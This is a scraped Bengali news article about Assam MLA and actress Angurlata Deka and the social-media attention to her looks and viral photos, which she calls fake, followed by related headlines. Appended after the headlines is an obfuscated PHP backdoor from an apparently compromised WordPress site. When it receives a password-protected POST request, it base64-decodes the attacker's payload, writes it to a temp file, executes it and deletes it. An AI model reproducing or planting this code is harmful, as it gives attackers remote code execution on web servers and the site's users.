শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

সুন্দরী বিধায়কের ‘উষ্ণ’ ছবি ইন্টারনেটে ভাইরাল (ছবিসহ)

1115আন্তর্জাতিক ডেস্ক : ভারতের রাজনীতির ময়দান এখন সরগরম নবনির্বাচিত সুন্দরী বিধায়ক অভিনেত্রী আঙ্গুরলতাকে নিয়ে। এমন একজন বিধায়ক অধিবেশনকেও ফুরফুরে মেজাজে রাখবেন বলে মন্তব্য করেছেন অনেকে। সামাজিক যোগাযোগ মাধ্যমে তো রীতিমতো হইচই চলছে তাকে নিয়ে। কে কার চেয়ে সুন্দর ছবি পোস্ট করতে পারেন তাই নিয়ে চলছে প্রতিযোগিতা। সবাই তার রাজনীতি নিয়ে কথা না বলে মেতেছেন রূপের প্রশংসায়।

সম্প্রতি আসামের বিধানসভা নির্বাচনে বিজেপি থেকে বিধায়ক নির্বাচিত হয়েছেন জনপ্রিয় অভিনেত্রী আঙুরলতা ডেকা।

সুন্দরী এই নারীকে নিয়ে মাতোয়ারা সামাজিক যোগাযোগ মাধ্যম। এর আগেও ঢের ঢের অভিনেতা-অভিনেত্রী এসেছেন ভারতের রাজনীতিতে। তবে অনেকে বলছেন, রাজনীতির ময়দানে অন্য সব সুন্দরী নারীকে ছাপিয়ে যাবেন আঙ্গুরলতা।

আসামের সবচেয়ে জনপ্রিয় অভিনেত্রী আঙুরলতা বাতাডোবা বিধানসভার আসন থেকে নির্বাচিত হয়েছেন।

আসামে বিধানসভা নির্বাচনের প্রচারের মঞ্চে মোদির পাশে আঙুরলতার ছবি তাকে আলোচনার শীর্ষে এনে দিয়েছে। এমন আলোচনায় খুশি আঙুরলতা। তার বিশ্বাস, রাজনীতির আঙিনায় তার ভক্তের অভাব হবে না। তবে তিনি সাধারণ মানুষের পাশেই থাকতে চান।

এদিকে আঙ্গুরলতাকে ভারতের সবচেয়ে ‘হট’ এমএলএ আখ্যা দিয়ে সংবাদ প্রচার করেছে দেশটির বিভিন্ন গণমাধ্যম। এ নিয়ে সামাজিক যোগাযোগ মাধ্যমে ভোটেরও আয়োজন করেছে অনেকে। জানতে চাওয়া হয়েছে, ‘আঙ্গুরলতাই কি ভারতের সবচেয়ে ‘হট’ এমএলএ?’ এদিকে আঙ্গুরলতা ডেকার জিমের পোশাক পরা ও স্বল্পবসনা কিছু ছবি সামাজিক যোগাযোগ মাধ্যমে ভাইরাল হয়ে গেছে। যদিও আঙ্গুরলতার পক্ষ থেকে ছবিগুলোকে ‘ফেক’ বলে জানানো হয়েছে।

আঙুরলতা ডেকা সম্পর্কে মন্তব্য করে বিতর্কে জড়িয়েছেন বলিউডের বিশিষ্ট পরিচালক রামগোপাল ভার্মা। টুইটারে তিনি বলেন, ”যদি এখন বিধায়করা এমন দেখতে হন, তা হলে সত্যিই `আচ্ছে দিন` এসে গেছে। ধন্যবাদ আঙুরলতাজি। ধন্যবাদ মোদিজি। এই প্রথম আমি রাজনীতিকে ভালোবেসে ফেললাম।”

এই টুইটে বিতর্ক শুরু হলে বলিউডের এই পরিচালক জানান, আমি শুধু তার প্রশংসা করতে চেয়েছি।

– See more at: http://www.bd-pratidin.com/international-news/2016/05/27/147309#sthash.ly56dbr6.dpuf

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}